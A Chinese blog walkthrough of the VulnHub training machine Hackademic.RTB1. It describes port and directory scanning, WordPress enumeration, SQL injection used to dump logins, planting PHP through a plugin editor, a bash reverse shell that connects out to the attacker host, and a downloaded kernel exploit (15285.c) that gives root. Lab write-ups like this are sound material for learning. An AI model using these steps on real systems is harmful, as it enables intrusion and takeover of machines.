Hackademic.RTB1靶场实战【超详细】

于 2024-08-14 20:16:38 发布
阅读量97 收藏 3
点赞数 4
分类专栏: vulnhub靶机 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68615160/article/details/141199455
版权

靶机下载链接:https://download.vulnhub.com/hackademic/Hackademic.RTB1.zip

一、主机探测和端口扫描

nmap 192.168.121.0/24

ip:192.168.121.196

端口:22、80

二、访问80端口

发现target可点击

点击后跳转,页面提示目标是读取到 key.txt 文件

findsomething插件 查看网站的js接口

拼接 /Hackademic_RTB1/?feed=rss 看到 wordpress 版本

三、目录扫描

dirb http://192.168.121.196/

前面发现为 wordpress,kali 使用 wpscan 扫描网站

wpscan --url  http://192.168.121.196

其中发现了一个路径 http://192.168.23.143/Hackademic_RTB1/wp-content/themes/starburst/style.css

可以看到 wp-content 位置,尝试将其修改为 wordpress的默认路径wp-admin,发现后台登录页面

使用 wpscan 扫描用户

使用 cewl 爬取网站密码文本

cewl 192.168.121.196 -w pass.txt

密码未能成功爆破

我们回到findsomething中,发现url中携带参数

可以进行sql注入

首先测cat参数,发现存在sql注入

dump 下数据,获取账号密码

挨个登录,登录GeorgeMiller发现插件里面能直接修改php代码,我们添加phpinfo,发现成功解析

四、get shell

exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.121.171/4444 0>&1'");

kali开启监听,访问hello.php文件,成功反弹shell

五、提权

使用 python 启用交互式shell

sudo -l

查看当前权限,发现需要密码

查看内核版本

uname -a

搜一下相关版本的提权漏洞

searchsploit linux kernel 2.6.3

排除一些其他 linux 操作系统,精确版本,尝试后发现 15285.c 可利用

searchsploit -m 15285

开启一个临时 web 服务,靶机将其下载到 tmp 目录下

python3 -m http.server

wget http://192.168.121.171:8000/15285.c

进行编译后,执行文件,提权成功

gcc 15285.c -o 15285
./15285

橙子iiii
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[VulnHub靶机渗透] Hackademic: RTB1
人若无名,便可专心练剑
05-06 1056
靶机精讲之Hackademic: RTB1,vulnhub靶机,手动SQL注入,小试牛刀,内核提权。读遍牙签三万轴,欲来小邑试牛刀。
Kali(docker)之Hackademic靶场实战(一)启动靶场
single_g_l的博客
01-06 3435
1、根据提示,创建目录 根据提示完成执行命令 cd /tmp/ git clone -b master https://github.com/Hackademic/hackademic.git rm -rf /app/* #如果根目录下没有app目录,需要新建 mkdir /app/ cp -r /tmp/hackademic/* /app/ chown www-data:www-data -R /app/ rm -rf /tmp/hackademic 2、启动靶场 ..
HackademicRTB1靶机练习
IWANnaaa的博客
11-14 421
HackademicRTB1靶机练习
5、Hackademic-RTB1(VulnHub)
carmi的博客
04-10 329
Hackademic-RTB1 一、nmap 扫全端口会爆炸,暂时使用默认先扫描出两个 二、web渗透 随便看看 简单目录爆破 /Hackademic_RTB1/ 根据界面提示,我们可以来到这个目录 源码处发现框架 再次目录爆破 wscan扫描 WordPress 1.5.1 searchsploit /wp-content/plugins/ 在目录爆破中发现插件目录,这...
黑客是如何攻破一个网站的?
资深程序员,曾自学JAVA,C#,如今从业于网安行业
07-22 546
一篇科普文,很适合小白,长文请静下心看。通过本文你将了解黑客常用的入手思路和技术手法,适合热爱网络信息安全的新手朋友了解学习。本文将从最开始的信息收集开始讲述黑客是如何一步步的攻破你的网站和服务器的。阅读本文你会学到以下内容:1.渗透测试前的简单信息收集。2.sqlmap的使用3.nmap的使用4.nc反弹提权5.linux系统的权限提升6.backtrack 5中渗透测试工具nikto和w3af的使用等.假设黑客要入侵的你的网站域名为:hack-test.com。
打靶指令经验集合(渗透上)
dashaziyihao的博客
11-22 1645
来来回回打了一些靶场,现在对靶场利用到的一些手段和语句进行一个记录。某些工具的参数大小写具有区分,所以使用的时候一定要查看说明。
MATLAB RTB(RoboticsToolbox for MATLAB)9.10安装包
09-12
1. **机器人建模**:RTB9.10允许用户创建复杂的机器人模型,包括连杆结构、关节类型以及传感器配置。用户可以定义机械臂的各个链接,设置关节的自由度,并且可以处理各种类型的关节,如旋转关节、平移关节等。 2. *...
OpenRTB2.5的中文翻译文档
01-13
OpenRTB(Open Real-Time Bidding)是一种开放的实时竞价协议,主要用于数字广告领域,特别是程序化购买。这个协议定义了广告交易平台(Ad Exchange)如何与供应方平台(Supply-Side Platform, SSP)和需求方平台...
matlab 机器人工具箱 m类型 RTB.mltbx
05-01
matlab 机器人工具箱 适合于毕业设计、自学、科研等 在MATLAB的环境下,使用RoboticsToolbox工具箱建立该机器人的数学模型,并对其进行运动学仿真及轨迹规划。 在官网下载的 绝对好用 安装路径 只需要在matlab ...
RVC 1st edition_RTB9 MVTB3 (2011).zip
04-10
MATLAB机器人及机器视觉组合工具箱_2011年第一版[petercorke.com]; 官网[https://petercorke.com/toolboxes/robotics-toolbox/]搬运来的,仅分享学习使用,如有侵权,立即删除。
iwanvi-adx RTB协议规范1
08-04
《iwanvi-adx RTB协议规范详解》 实时竞价(Real-Time Bidding, RTB)是一种在互联网广告领域广泛应用的技术,它允许广告商在每一次广告展示机会出现时进行实时竞标。iwanvi-adx RTB协议规范是这个领域的核心标准之...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8385
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Python 操作 MySQL 数据库.pdf
08-13
Python 操作 MySQL 数据库.pdf
安装包单片机开发.zip
08-13
安装包
信息安全简单介绍.pdf
08-13
信息安全简单介绍.pdf
简历-求职简历-word-文件-简历模版免费分享-应届生-高颜值简历模版-个人简历模版-简约大气-大学生在校生-求职-实习
08-13
python简历-求职简历-word-文件-简历模版免费分享-应届生-高颜值简历模版-个人简历模版-简约大气-大学生在校生-求职-实习 简历是展示个人经历、技能和能力的重要文档,以下是一个常见的简历格式和内容模板,供您参考: 简历格式: 头部信息:包括姓名、联系方式(电话号码、电子邮件等)、地址等个人基本信息。 求职目标(可选):简短描述您的求职意向和目标。 教育背景:列出您的教育经历,包括学校名称、所学专业、就读时间等。 工作经验:按时间顺序列出您的工作经历,包括公司名称、职位、工作时间、工作职责和成就等。 技能和能力:列出您的专业技能、语言能力、计算机技能等与职位相关的能力。 实习经验/项目经验(可选):如果您有相关实习或项目经验,可以列出相关信息。 获奖和荣誉(可选):列出您在学术、工作或其他领域获得的奖项和荣誉。 自我评价(可选):简要描述您的个人特点、能力和职业目标。 兴趣爱好(可选):列出您的兴趣爱好,展示您的多样性和个人素质。 参考人(可选):如果您有可提供推荐的人员,可以在简历中提供其联系信息。 简历内容模板: 姓名: 联系方式: 地址: 求职目标: (简短描
UGUI Super ScrollView v2.5.4
08-13
一个好用的Unity UGui 循环滚动列表插件. 有 List 和 Grid 等多种模式, 包含了脚本代码, 以及相关的一些示例Demo. UGUI Super ScrollView gives easily-customizable ScrollView, based on UGUI ScrollRect. It is a set of C# scripts to help you create ScrollView that you need. It’s very powerful and highly optimized for performance.
video_20240811_193112.mp4
最新发布
08-13
video_20240811_193112.mp4
rtb10.4.mltbx下载
11-16
rtb10.4.mltbx是一个MATLAB工具箱文件,用于在MATLAB软件中进行实时竞价广告买卖(RTB)相关的数据处理和分析。要下载这个工具箱文件,您可以按照以下步骤操作: 首先,您需要通过互联网连接到MATLAB官方网站或者其他可靠的下载渠道。 接着,在搜索框中输入“rtb10.4.mltbx”,然后点击搜索按钮。 在搜索结果中找到并点击rtb10.4.mltbx工具箱的下载链接。 在下载页面上,可能需要您登录MATLAB账户或者进行一些身份验证。 完成身份验证后,您可以点击下载按钮,等待文件下载完成。 一旦rtb10.4.mltbx文件下载完成,您可以在MATLAB软件中打开该文件进行安装。 在MATLAB软件中,选择“添加-Ons”选项,然后选择“从文件安装”来导入rtb10.4.mltbx文件。 导入成功后,您就可以在MATLAB中使用rtb10.4.mltbx工具箱了。 需要注意的是,下载任何文件时都需要注意文件来源的可靠性,以免下载到恶意软件或病毒。另外,如果是在工作环境中使用,可能需要获得相关许可证或者和公司的IT部门协商才能进行安装和使用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值